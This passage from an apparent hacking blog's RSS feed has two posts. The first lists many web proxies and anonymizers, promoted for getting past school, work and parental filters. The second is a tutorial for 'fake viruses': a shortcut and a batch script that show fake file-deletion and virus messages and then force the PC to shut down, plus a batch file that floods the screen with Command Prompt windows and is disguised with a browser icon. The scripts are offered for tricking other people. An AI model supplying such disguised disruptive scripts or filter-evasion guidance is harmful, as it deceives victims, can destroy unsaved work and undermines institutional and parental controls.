such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client. A proxy server may optionally alter the client's request or the server's response, and sometimes it may serve the request without contacting the specified server. In this case, it 'caches' responses from the remote server, and returns subsequent requests for the same content directly.The proxy concept was invented in the early days of distributed systems as a way to simplify and control their complexity. Today, most proxies are a web proxy, allowing access to content on the World Wide Web.UsesA proxy server has a large variety of potential purposes, including:&amp;nbsp;&amp;nbsp;&amp;nbsp; To keep machines behind it anonymous, mainly for security.[2] &amp;nbsp;&amp;nbsp;&amp;nbsp; To speed up access to resources (using caching). Web proxies are commonly used to cache web pages from a web server.[3] &amp;nbsp;&amp;nbsp;&amp;nbsp; To apply access policy to network services or content, e.g. to block undesired sites. &amp;nbsp;&amp;nbsp;&amp;nbsp; To access sites prohibited or filtered by your ISP or institution. &amp;nbsp;&amp;nbsp;&amp;nbsp; To log / audit usage, i.e. to provide company employee Internet usage reporting. &amp;nbsp;&amp;nbsp;&amp;nbsp; To bypass security / parental controls. &amp;nbsp;&amp;nbsp;&amp;nbsp; To circumvent Internet filtering to access content otherwise blocked by governments.[4] &amp;nbsp;&amp;nbsp;&amp;nbsp; To scan transmitted content for malware before delivery. &amp;nbsp;&amp;nbsp;&amp;nbsp; To scan outbound content, e.g., for data leak protection. &amp;nbsp;&amp;nbsp;&amp;nbsp; To allow a web site to make web requests to externally hosted resources (e.g. images, music files, etc.) when cross-domain restrictions prohibit the web site from linking directly to the outside domains. * source wikipedia * So here is the List of best anonymizers and proxy servers &amp;amp; bypass web-filters ! ShadowBrowser – anonymously surf the internet and protect your Internet history at the same time. No software to download and supports SSL websites.http://www.proxyking.netAnonymouse – a very good free anonymizer. By using this CGI proxy you can anonymously surf web pages, send anonymous e-mails and look at news.URL (for proxy chaining):http://anonymouse.wsAnonymousIndex.com – Anonymous private surfing service, hide your ip, manage website ads, referrers and cookies through this free web based proxy.URL (for proxy chaining):http://www.hidemyass.comProxy7.com – Free webbased proxy. By using this proxy you can surf the Internet securely and safely. This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.URL (for proxy-chains):http://www.anonymousindex.comwww.HideMyAss.com – Free anonymous browsing, for the times when you REALLY need to hide your ass online!URL (for proxy chaining):www.ProxyFoxy.com – Proxy Foxy offers you free anonymous surfing. With our free tool you can surf the Internet safe and secure without revealing your identity. Avoid cookies, spyware and other malicious scripts.URL (for making proxy chaining):http://www.proxyfoxy.com/78Y.NET – It is a web anonymous web proxy designed to bypass proxy restrictions through a web interface. If, for example, in your university, college, job, etc, the IT department blocks a lot of harmless websites simply because of their popularity, so you can use 78Y.NET proxy service to access those websites.URL (to create proxy chains):http://www.78y.net/www.75i.net - 75I.NET is anonymous CGI Proxy that allows anyone to surf the Internet privately and securely without any restrictions. 75I.NET anonymous web surfing proxy service is free.URL (to create chains of proxies):http://www.75i.netwww.dzzt.com – This anonymizer always hides your IP address, so all sites will not be able to uniquely your identify or track you. You’re able to access from your school, college, university, etc, the websites, which are restricted by your IT department.URL (for proxy chaining):http://www.dzzt.comProxy Guy – The Proxy Guy offers free anonymous surfing. Now you can surf safe and secure with the click of a button.URL (for making proxy chaining):http://www.proxyguy.comwww.GamesProxy.com – Games Proxy helps you to play all your favourite flash games free online by using fast secure web proxy. Apart from playing free flash games you can also use Games Proxy to browse all your favourite sites such as ebay, hotmail &amp;amp; more!www.proxyz.be – It is a free internet service which allows you to surf anonymously and it “changes” your ip. You can also use it to access/bypass blocked websites on your school or office.URL (for making proxy chaining):http://www.proxyz.bewww.antifw.tk – Anti-firewall redirector. It allows to hide your IP and a name and a type of the file you gets from internet. Now corporate internet firewall will not be able to determine your internet activity.www.ProxyHero.com – Fast and Secure US Proxy. PHP Based, and very easy to use. Completely free, and will keep you anonymous while browsing the internet.URL (for making proxy chaining):http://www.proxyhero.comwww.ProxyDrop.com – This is a free CGI proxy with HTTPS support. This service also includes the usual features including removing client side scripting, showing text only and enabling or disabling cookies. It also supports rotate13 or base64 URL encoding. Mirror1 Mirror2 Mirror3 Mirror4URL (for making proxy chaining):http://www.proxydrop.comhttp://www.proxydrop.nethttp://www.proxydrop.bizhttp://www.proxydrop.infohttp://www.proxydrop.orgwww.prx1.com – This is a free, safe, anonymous web proxy with configurable options. Browsing anonymously with prx1.com increases your security and lets you access web sites from behind a firewall.URL (for making proxy chains):http://www.prx1.comwww.ninjaproxy.com&amp;nbsp;It is a free anonymous web based proxy service. With Ninja Proxy you can browse your favorite web sites anonymously and even from behind a firewall with blocked ports.URL (for making proxy chains):http://www.ninjaproxy.comShadowSurf free anonymous proxy – Surf privately and 100% anonymously with ShadowSurf’s FREE web proxy. You can access blocked sites while keeping your IP secret. No software needed.URL (for making proxy chaining):http://www.shadowsurf.comFamous5.net Proxy – Free browser based anonymizer without any software. Bypass bans and hide your ip through famous5.net proxy.URL (for making proxy chains):http://www.famous5.netNo1Proxy.com -&amp;nbsp;Free proxy site with a cgi proxy tool, daily updated proxy lists and information on anonymous and https proxy servers. URL (for creating proxy chain): http://www.no1proxy.comProxySpy.com – Proxy Spy protects your privacy and keeps your computer secure by allowing you without revealing your IP address or personal information. Proxy Spy has a range of features including disabling javascript, encoding URLs to bypass filters, disable showing of images, reject cookies etc. Proxy Spy is hosted on a fast server with high uptime – this means you can always count on it, day or night, to protect you.TheProxy.be – TheProxy always hides your IP address, so all sites will not be able to uniquely your identify or track you. It`s absolutely free. Mirror Mirror1URL (for making proxy chains):http://www.theproxy.behttp://www.newproxy.behttp://www.smartproxy.netProxyPrince.com – Very fast US based PHP proxy. Very easy to use, and very quick. ProxyPrince will keep you safe and secure. Anonimity is our main concern, your tracks are sure to be kept hidden.PimpMyIP.com – Free anonymous web proxy. Bypass blocked websites and browse privately at work or school. Shields you against cookies, spyware and malicious scripts.OhMyProxy.com – Free Anonymous Browsing. Hide your IP and get past school and work filters.Clever Proxy – Clever Proxy is a smart and intelligent web-based proxy service. It allows you to remain anonymous whilst using the internet. By using this anonymizer you will also be protecting your computer because when you surf anonymously people cannot find out your IP address and attempt to hack you.A Proxy Site – A Proxy Site is a simple and reliable web-based anonymizer. By using it you can bypass filters and remain completely anonymous whilst surfing the internet. It has many features including blocking JavaScript and cookies.Fully Sick Proxy – Fully Sick proxy allows you to remain anonymous on the internet by routing web requests for you. This means you can stay protected and also disable javascript and block cookies. Our site is fast and reliable too.Desire Proxy – Desire proxy is a premium free anonymous proxy. It provides many of the features of the paid services for nothing! These include cookie removal, no image browsing and more. Keep anonymous and keep secure with Desire Proxy. We know what you desire!Perfect Proxy – Perfect Proxy is just that – perfect! It provides excellent reliability and website support and also keeps you anonymous in the process. It has many additional features to add to the experience.Prime Proxy – Prime Proxy provides a great free proxy service to the general public. It keeps you anonymous and safe whilst browsing your favorite websites. Prime Proxy is used by students and adults in many different situations. Try us today – it’s 100% free!Proxy Aware – Since you’re visiting freeproxy.ru you must be proxy aware, so why not check out Proxy Aware? It’s a perfect free proxy which keeps you anonymous whilst browsing the web! It has many additional features such as cookie blocking, disabling images and URL encoding to bypass school and work filters.Proxy Craze – At the moment there is a proxy craze going on, and Proxy Craze is proud to be part of it! With a delicious serving of features to make any proxy user cry, Proxy Craze is the proxy of choice! Features include URL encoding, cookie blocking / image blocking, and a neat interface!Proxy Gasp – Our proxy is so good it will make you gasp – as the name suggests. To use this proxy simply type the URL into the website and gasp.your at the site remaining totally anonymous! This means websites cannot record your IP and later use it to hack or send you junk!Proxy Please – Well, thanks for saying please! This is a great proxy site with all the usual features including cookie blocking, no images, URL encoding all whilst being extremely fast and reliable. If you want to bypass filters then this is the site you need!Some Proxy – Easy to remember domain, great features, and nice and fast! Keeps you totally anonymous whilst browsing the internet, and allows you to bypass filters and school or at work. Features include URL encoding and cookie blocking!Stupid Proxy – Despite the name, this proxy is anything but stupid! If you’re going to use a proxy, use Stupid Proxy! It’s no frills yet great to use including many simple features that will make your life easier including URL encoding (bypass filters) and image-less browsing. Enjoy!That Proxy – Which proxy – this proxy? Why not! A bunch of excellent features, fast and reliable and a clean and neat design are all reasons why you should choose ‘That Proxy’! By using our site you will remain anonymous and avoid security issues like people hacking your computer.Want Proxy – For you to be at this site you must want some proxy, so all you need to do is type that in, and finish it with a .com, and you’re done! ‘Want Proxy’ is an excellent proxy site that you’ll end up using all the time. It’s a favorite amongst students and workers who want to bypass filters.www.UnBlockMySpace.com – Unblock MySpace is a free service created to view MySpace proxy website from school and work computers through a PHP and CGI backend (web based proxy). This site uses the server proxy IP for surfing the web anonymously. Protect your privacy! Surf Anonymously! Bypass Security Filters! Private Browsing!www.ProxyForAll.com – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.www.MyProxySurfer.com – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.www.ProxyCat.com – Proxycat.com is a free easy to use cgi proxy service that blocks cookies and hides your IP to keep you anonymous as you surf the web.www.ProxyDetective.com – ProxyDetective – Simple and Free cgi-webbased anonymous proxy surfing. Surf safely from your work, school or home.www.indianproxy.com – Access your webmail, myspace, and much more in school or work anonymously.www.proxybrowsing.com – Access blocked websites in school or work safely and anonymously. Surf with Ad Free Browsing Pages!www.ProxyPi.com – We do not sleep until you have a safe route. Use us at school, work or home. We can bypass most filters.www.proxyjet.com – Hide your movements via our anonymous proxy. Our proxy will bypass school and work filters.www.justhide.com – We allow you to bypass your school and work filters to allow you surf the internet anonymously.Other anonymizersAnonymization – free web anonymyzer. Supports anonymous web surfing, anonymous web seek (meta search by many search engines) and FTP surf – surf anonymously in any FTP server. By using this web proxy you can surf anonymously more than 5.000.000.000 web pages.URL (for proxy chaining):http://www.anonymization.netGuardster – good anonymizer. Controls cookies, scripts, ADs, images and referrers.URL (for proxy chaining):http://www.guardster.comProxyWeb – good anonymizer, can delete Java, JavaScript, cookies and ActiveX. Also this web proxy uses HTTPS (secure) connection – so nobody can detect what you download from Internet.URL (for proxy chaining):http://www.proxyweb.netWebWarper – This is a popular free web anonymizer. This CGI proxy can pack web pages “on the fly”.URL (for proxy chaining):http://webwarper.netMegaProxy – Free anonymizer can work with HTTPS sites.URL (for proxy chaining):http://www.megaproxy.comhttp://www.amegaproxy.comW3Privacy.com – free web based anonymizing proxy. Instant access, no download, no registration, and no fee required.URL (for proxy chaining):http://www.w3privacy.comAnonymizer.RU – russian anonymizer: this russian CGI proxy has many additional options only after registration.URL (for proxy chaining):http://www.anonymizer.ruThe-cloak – This is a free CGI proxy. This anonymizer supports HTTP, FTP and HTTPS sessions. Can hide referrers. Requires payment..URL (for chaining proxy):http://www.the-cloak.comPure privacy – cool anonymizer + remailer. You can use this anonymizer to send anonymous e-mails (by using this anonymizer with anonymous proxy)URL (for proxy chaining):http://www.pureprivacy.comProxify.com – Good fast anonymizer that can remove cookies, ADs, referrers and can use HTTPS connections.URL (for proxy chaining):http://proxify.comhttp://www.urlencoded.com– The better cgi proxy server. It has many different features, inclusive enabling / disabling cookies, all scripts, AD banners, referrer information, browser and OS info and many more.URL (for cgi proxy chaining):http://www.urlencoded.comhttp://www.snoopblocker.com – Good cgi proxy (anonymizer). It uses 128-bit SSL-encoding. Can enable/lock Java, JavaScript, Cookies, ActiveX.URL (for creating anonymizers chain):http://www.snoopblocker.comhttp://www.long999.com– Mirrorwww.psurf.net – Psurf is one of the fatest proxy services on the net. Using new and advanced technology to help you bypass your school firewalls and filters. Allowing you to view what you want, when you want!http://www.phproxy.infohttp://www.proxy121.com– The 121 relationship between you and annonimity. Fast, reliable and secure! Mirror1http://www.bigate.com/cgi-bin/bigate/b/k/k/http://www.userbeam.dehttp://www.calcmaster.nethttp://www.misterprivacy.com/begin_anonymous_surfing.htmhttp://www.myshield.comhttp://www.idzap.comhttp://www.safegatetech.comhttp://www.breiter.ch/http://www.rrdb.org/rrdbproxy.php?l=enhttp://proxy.decodes.biz/http://proxy.mxds.ch/http://www.spondoo.com/http://search.sicomm.us/http://schnarre-monika.celebrityblog.net/cache.cgihttp://filter2005.com/http://www.kproxy.com/http://www.websitereactor.org/cgi-bin/001/nph-.plhttp://www.goproxing.com/http://anonycat.com/http://www.spynot.com/http://www.merletn.org/anonymizerhttp://www.cgi-proxy.net/http://www.proxymouse.com/http://www.theunblocker.tk/http://www.betaproxy.com/http://www.letsproxy.com/http://www.freeproxysurf.info/http://www.mysticproxy.com/http://www.proxywave.com/http://www.vtunnel.com/http://www.proxysnail.com/http://www.freeproxy.ca/http://basic.3proxy.com/http://www.privatebrowsing.com/http://www.hackingtruths.org/proxyhttp://xanproxy.be/http://www.ipsecret.com/http://www.proxyanon.com/http://www.anonproxy.info/http://www.proxysafe.com/http://www.strongproxy.com/http://www.boredatschool.net/http://www.ukproxy.com/http://www.simpleproxy.com/http://www.phproxy.org/http://surfonym.com/http://geoepker.hu/freeproxy/http://www.browseatwork.com/http://www.ipblocker.info/http://www.boredatwork.info/http://www.anonymousurfing.info/http://www.browsingwork.com/http://www.freeproxyserver.org/http://www.browseany.com/http://www.browsesecurely.com/http://IEproxy.com/http://www.sneak3.po.gs/http://www.proxytastic.com/http://www.freewebproxy.org/http://www.thecgiproxy.com/http://www.hide-me.be/http://www.anotherproxy.com/http://www.proxy77.com/http://www.surf-anon.com/http://www.free-proxy.info/http://www.theproxysite.info/http://www.proxyify.info/http://www.concealme.com/http://browseschool.info/http://browsework.info/http://browsingschool.info/http://browsingwork.info/http://browsingschool.com/http://www.proxyindex.com/http://www.gobyproxy.com/http://www.proxifyme.com/http://www.proxyghost.com/http://www.spysurfing.com/http://www.unblockthis.com/http://www.proxyserver7.com/http://www.daveproxy.co.uk/http://www.tntproxy.com/http://www.neoproxy.net/http://www.bypassbrowser.com/http://www.procksie.com/http://www.httproxy.com/http://www.cgiproxy.info/http://www.silentsurf.com/cgi-bin/nph-index.cgihttp://www.proxy-sock.com/http://www.proxygeek.com/http://www.datadefense.org/http://www.hideyour.info/http://www.howto.pro/http://www.collegeproxy.com/http://www.demonproxy.com/http://www.satanproxy.com/http://www.hidingyou.com/http://www.intelliproxy.com/http://www.fireprox.com/http://www.h0h0h0.com/firewall/http://www.katedrala.cz/http://www.browseatwork.net/http://www.2255.info/http://www.vproxy.be/http://www.boxproxy.com/http://www.nopimps.com/http://www.fsurf.com/http://www.proxylord.com/http://roachhost.com/hp/http://www.freepr0xy.com/http://www.proxypop.com/http://proxy.winidn.com/http://www.cloax.net/http://www.proxy247.com/http://www.traceless.com/http://www.siatec.net/proxyanonymizerhttp://www.stealth-ip.net/http://www.proxywhip.comhttp://www.proxy-surf.net/http://www.videoeditors.info/proxy/http://www.blockmy.info/http://www.proxychatroom.com/http://www.teenpropy.com/http://www.totalupload.com/surf/http://www.proxene.com/http://www.fileshack.us/proxy.phphttp://www.cloaker.ca/http://www.proxified.net/http://www.mrreid.net SHARE IT if u like :)</itunes:summary><itunes:keywords>bypass web-filters, List of best anonymizers, list of proxy servers, Uses of proxy server</itunes:keywords></item><item><title>Make a Fake and Harmless Virus</title><link>http://hackrich.blogspot.com/2011/10/make-fake-and-harmless-virus.html</link><category>education</category><category>Make fake virus</category><category>study</category><category>Virus</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 18 Oct 2011 14:09:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-9163433249297016221</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAoZFEuT16ztgytfqbcjvvUlvWjPzFJzcmozUVQNLeHNG3-lfxDUykTxyMQdDEis5nYPAO4rtpXzYAS5YuWakIr25Kr3FXhWs7-zN-ocgqrFRSfYL4OAjRtTzn-8cznebb5hXIUTKfAWSF/s1600/fake-virus-bsod-error.png" imageanchor="1"&gt;&lt;img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAoZFEuT16ztgytfqbcjvvUlvWjPzFJzcmozUVQNLeHNG3-lfxDUykTxyMQdDEis5nYPAO4rtpXzYAS5YuWakIr25Kr3FXhWs7-zN-ocgqrFRSfYL4OAjRtTzn-8cznebb5hXIUTKfAWSF/s400/fake-virus-bsod-error.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;ul style="color: #351c75; text-align: left;"&gt;&lt;li&gt;Right-click on your desktop, go to "new" and click "Create Shortcut"&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="color: #351c75; text-align: left;"&gt;&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; A window will come up. Where it says "Location" enter: shutdown -s -t&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="color: #351c75; text-align: left;"&gt;&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; The rest of the location is customizable. After the -t, press space and enter the amount of time you want someone to have until shutdown in seconds with only numbers when virus is activated. Press space and enter -c then another space and in quotations, type in a comment that will appear when the computer is shutting down. Click "Next". (example: shutdown -s -t 10 -c "WARNING: VIRUS DETECTED. BEGIN SHUTDOWN")&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="color: #351c75; text-align: left;"&gt;&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; On the next screen, name your virus whatever you want, it will still have the same effect. Click "OK".&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="color: #351c75; text-align: left;"&gt;&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your fake virus will be on your desktop as whatever you named it. Click to activate it. If done correctly a shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes.&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="color: #351c75; text-align: left;"&gt;&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; TO ABORT THE FAKE VIRUS YOU MUST click the Start button on your taskbar and click run. Then type in: shutdown -a&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="color: #351c75; text-align: left;"&gt;&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Heres another way to make a virus, it's completely harmless, all it does is create a folder in your all programs menu and shutdown your pc =) Open notepad and save as whatever.bat:&lt;/li&gt;
&lt;/ul&gt;&lt;div style="text-align: left;"&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/div&gt;&lt;ol style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&amp;nbsp;&lt;span style="color: #38761d;"&gt; &amp;nbsp;cls&lt;/span&gt;&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; :A&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; color 0a&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; cls&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; @echo off&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Wscript.Sleep&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Wscript.Sleep 5000&amp;gt;C:\sleep5000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Wscript.Sleep 3000&amp;gt;C:\sleep3000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Wscript.Sleep 4000&amp;gt;C:\sleep4000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Wscript.Sleep 2000&amp;gt;C:\sleep2000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; cd %systemroot%\System32&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; dir&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; cls&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep3000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Deleting Critical System Files...&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo del *.*&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep3000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Deletion Successful!&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Deleting Root Partition...&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep2000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo del %SYSTEMROOT%&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep4000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Deletion Successful!&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep2000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Creating Directory h4x...&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; cd C:\Documents and Settings\All Users\Start Menu\Programs\&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; mkdir h4x&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep3000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Directory Creation Successful!&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Execution Attempt 1...&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep3000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo start hax.exe&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep3000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Virus Executed!&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep2000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Disabling Windows Firewall...&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep2000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Killing all processes...&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep2000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Allowing virus to boot from startup...&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep2000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Virus has been executed successfully!&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep2000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo:&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo Have fun!&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; start /w wscript.exe C:\sleep2000.vbs&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; pause&lt;/li&gt;
&lt;li style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; shutdown -f -s 10 -c "Your computer has committed suicide. Have a nice day."&lt;/li&gt;
&lt;/ol&gt;&lt;div style="text-align: left;"&gt;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style="color: #351c75;"&gt; For a way to have a bunch of Command Prompts pop up out of nowhere go to notepad and type in "start" alot (don't add quotations)&lt;/span&gt;&lt;div style="text-align: left;"&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Save it as whatever.bat to your desktop&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; When you open it however many times you typed "start" thats how many times the command prompt will pop up&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; You can disquise it as the Internet Explorer by right clicking on the fake virus and hit properties and find the button that says "Change Icon" then find the internet explorer (or mozilla firefox if you prefer or if you have the icon) icon and double click it&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; It should change automatically after you hit OK&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To get rid of them all at once wait until it all stops popping up then click CTRL+ALT+DEL and go to task manager and click the top task and hold down CTRL+SHIFT and go down to the last task and then click it (all the tasks should be highlighted) then click "end task" and it should erase all the tasks (now here are the 50 starts) &lt;/span&gt;&lt;br /&gt;
